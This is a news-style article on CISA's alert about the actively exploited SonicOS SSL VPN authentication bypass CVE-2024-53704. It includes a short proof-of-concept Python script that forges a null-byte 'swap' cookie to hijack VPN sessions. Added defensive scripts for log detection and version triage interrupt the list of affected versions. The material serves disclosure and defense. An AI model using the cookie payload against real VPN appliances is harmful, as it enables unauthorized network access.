The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding the active exploitation of a critical remote code execution (RCE) vulnerability in SonicWall's SonicOS, tracked as CVE-2024-53704.
Added to CISA's Known Exploited Vulnerabilities (KEV) catalog on February 19, 2025, the flaw allows unauthenticated attackers to hijack SSL VPN sessions and bypass authentication mechanisms entirely.
Federal agencies have until March 11, 2025, to remediate the vulnerability under Binding Operational Directive (BOD) 22-01.
Private-sector organizations, particularly in healthcare, finance, and critical infrastructure, are urged to prioritize patching because of the exploit's low complexity and stealthy attack vector.
Technical Analysis of the Authentication Bypass
The vulnerability resides in SonicOS's handling of SSL VPN session cookies in the getSslvpnSessionFromCookie function.
According to a report by Cyber Security News, researchers at Bishop Fox found that the system improperly processes Base64-encoded cookies containing null bytes, allowing attackers to forge valid session identifiers.
By crafting a payload of 32 null characters, encoding it as a Base64 string, and injecting it via the swap cookie, adversaries can hijack active VPN sessions without credentials.
A proof-of-concept Python script demonstrates the exploit's simplicity:
import base64, requests, urllib3, warnings

# Silence the warning that requests emits when certificate verification is off
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

# 32 null bytes, Base64-encoded, as the value of the swap cookie
payload = base64.b64encode(b"\x00" * 32).decode()

resp = requests.get(
    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
    cookies={"swap": payload},
    verify=False
)
print(resp.headers)
print(resp.text)
This script generates a malformed cookie that triggers the authentication bypass, granting attackers unrestricted access to VPN tunnels.
The flaw's CVSSv3 score of 9.8 reflects its critical severity, compounded by the lack of required privileges and ease of exploitation.
Affected Products and Mitigation Strategies
CVE-2024-53704 affects the following SonicOS versions:
- SonicOS 7.1.x (versions prior to 7.1.1-7058)
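Because the bypass rides on a cookie value rather than a failed login, the attack leaves no authentication failure in the usual logs. One place a defender can still see it is in whatever sits in front of the VPN portal (a reverse proxy, a WAF, or a packet capture) that records the Cookie header. The following is an added detection example, not code from the article or from SonicWall or Bishop Fox: it parses a hypothetical proxy log format (the field names and layout are assumptions), Base64-decodes the swap cookie and flags any request whose decoded cookie contains null bytes, with the all-null case, which is exactly the pattern described above, reported separately from partial variants and from values that are not valid Base64 at all.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Field layout of a hypothetical reverse-proxy log in front of the SSL VPN portal (an assumption).
LOG_RE = re.compile(
    r'^(?P<ts>\S+) client=(?P<client>\S+) path=(?P<path>\S+) cookie="(?P<cookie>[^"]*)"$'
)

# Constructed cookie values used by the sample log below.
ALL_NULL = base64.b64encode(b"\x00" * 32).decode()                          # the 32-null-byte pattern
MOSTLY_NULL = base64.b64encode(b"\x00\x00\x40" + b"\x00" * 29).decode()    # variant with one non-null byte
LEGIT = base64.b64encode(b"session-12345-ok").decode()                      # stand-in for a normal session id

# Constructed sample log lines (not real SonicWall or proxy output).
SAMPLE_LOG = f"""\
2025-02-20T10:01:02Z client=203.0.113.5 path=/cgi-bin/sslvpnclient?launchplatform= cookie="swap={ALL_NULL}"
2025-02-20T10:01:05Z client=198.51.100.7 path=/cgi-bin/sslvpnclient?launchplatform= cookie="lang=en; swap={LEGIT}"
2025-02-20T10:01:09Z client=203.0.113.5 path=/cgi-bin/sslvpnclient?launchplatform= cookie="swap={MOSTLY_NULL}"
2025-02-20T10:01:12Z client=192.0.2.9 path=/cgi-bin/sslvpnclient?launchplatform= cookie="swap=not-base64!!"
2025-02-20T10:01:15Z client=192.0.2.10 path=/cgi-bin/sslvpnclient?launchplatform= cookie="lang=en"
"""


def parse_swap_cookie(cookie_header: str) -> Optional[str]:
    """Return the value of the 'swap' cookie from a Cookie header string, or None if absent."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")  # split on the first '=' only; padding '=' stays in value
        if name == "swap":
            return value
    return None


def inspect_swap_cookie(value: str) -> Dict[str, object]:
    """Decode a swap cookie and classify it by how many null bytes it carries."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return {"verdict": "malformed", "null_bytes": 0, "length": 0}
    nulls = raw.count(0)
    if nulls and nulls == len(raw):
        verdict = "all_null"        # the exact shape of the forged cookie described in the write-up
    elif nulls:
        verdict = "contains_null"   # a valid session id should never decode to bytes containing NUL
    else:
        verdict = "ok"
    return {"verdict": verdict, "null_bytes": nulls, "length": len(raw)}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per request whose swap cookie is malformed or contains null bytes."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        value = parse_swap_cookie(m.group("cookie"))
        if value is None:
            continue
        result = inspect_swap_cookie(value)
        if result["verdict"] != "ok":
            findings.append({"ts": m.group("ts"), "client": m.group("client"),
                             "path": m.group("path"), **result})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Decoding with `validate=True` makes the check strict: anything outside the Base64 alphabet is reported as malformed rather than silently skipped, which is what you want for a field that a legitimate client always populates with a well-formed value. The same classification can be run against the swap cookie extracted from a packet capture if no proxy log exists.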
- SonicOS 7.1.2-7019
- SonicOS 8.0.0-8035
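Version strings like 7.1.1-7058 do not compare correctly as plain strings, so an inventory check needs to parse them. The following is an added example, not code from the article or from SonicWall: it parses SonicOS version strings into comparable tuples, encodes the affected set exactly as the list above states it (7.1.x prior to 7.1.1-7058, plus the two individually named builds), and triages a constructed inventory. The hostnames and versions are invented, and because the code reproduces this article's list rather than SonicWall's own advisory, the non-affected bucket is deliberately named "not_listed" rather than "safe".

```python
import re
from typing import Dict, List, Optional, Tuple

# SonicOS Gen6/Gen7 style version strings: major.minor.patch-build, e.g. "7.1.1-7058"
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)$")

Version = Tuple[int, int, int, int]  # (major, minor, patch, build)


def parse_sonicos_version(text: str) -> Optional[Version]:
    """Parse a SonicOS version string into a tuple that compares numerically, or None if unparseable."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, build = (int(x) for x in m.groups())
    return (major, minor, patch, build)


def is_affected_by_cve_2024_53704(text: str) -> bool:
    """Return True if the version is in the affected set as this article lists it."""
    v = parse_sonicos_version(text)
    if v is None:
        raise ValueError(f"unrecognised SonicOS version string: {text!r}")
    major, minor, patch, build = v
    # SonicOS 7.1.x releases prior to 7.1.1-7058
    if (major, minor) == (7, 1) and (patch, build) < (1, 7058):
        return True
    # The two builds named individually
    return v in {(7, 1, 2, 7019), (8, 0, 0, 8035)}


# Constructed inventory: hostname -> reported SonicOS version (not real devices; versions are assumptions).
INVENTORY: Dict[str, str] = {
    "fw-branch-01": "7.1.1-7040",
    "fw-branch-02": "7.1.2-7019",
    "fw-dc-01": "8.0.0-8035",
    "fw-dc-02": "8.0.0-8040",      # hypothetical later build, not in the article's list
    "fw-lab-01": "unknown",        # a device whose version could not be read
}


def triage_inventory(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Bucket hosts into patch_now / not_listed / unparsed, sorted by hostname for stable output."""
    result: Dict[str, List[str]] = {"patch_now": [], "not_listed": [], "unparsed": []}
    for host, version in sorted(inventory.items()):
        try:
            affected = is_affected_by_cve_2024_53704(version)
        except ValueError:
            result["unparsed"].append(host)   # never silently treat an unreadable version as fine
            continue
        result["patch_now" if affected else "not_listed"].append(host)
    return result


if __name__ == "__main__":
    for bucket, hosts in triage_inventory(INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Treating an unparseable version as its own bucket matters in practice: an exporter that returns an empty or odd string for a device should produce a follow-up task, not a green check mark.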
SonicWall has released firmware updates for Gen5–Gen7 firewalls, urging immediate deployment. Organizations unable to patch immediately should implement these mitigations:
- Restrict SSL VPN access to trusted IP ranges via firewall rules.
- Disable internet-facing management interfaces to reduce exposure.
- Enforce multi-factor authentication (MFA) for all VPN users, eliminating reliance on single-factor credentials.
With over 500,000 global customers, including government agencies, SonicWall's widespread adoption magnifies the vulnerability's risk profile.
Federal agencies face mandatory remediation under CISA's directive, but private-sector entities remain equally vulnerable.
The exploit's ability to bypass authentication undetected complicates incident response, as attackers gain persistent access without triggering traditional security alerts.
CISA's warning underscores the escalating sophistication of attacks targeting network appliances.
As threat actors pivot from software to hardware vulnerabilities, proactive firmware management and layered authentication defenses are essential to mitigating modern cyber risks.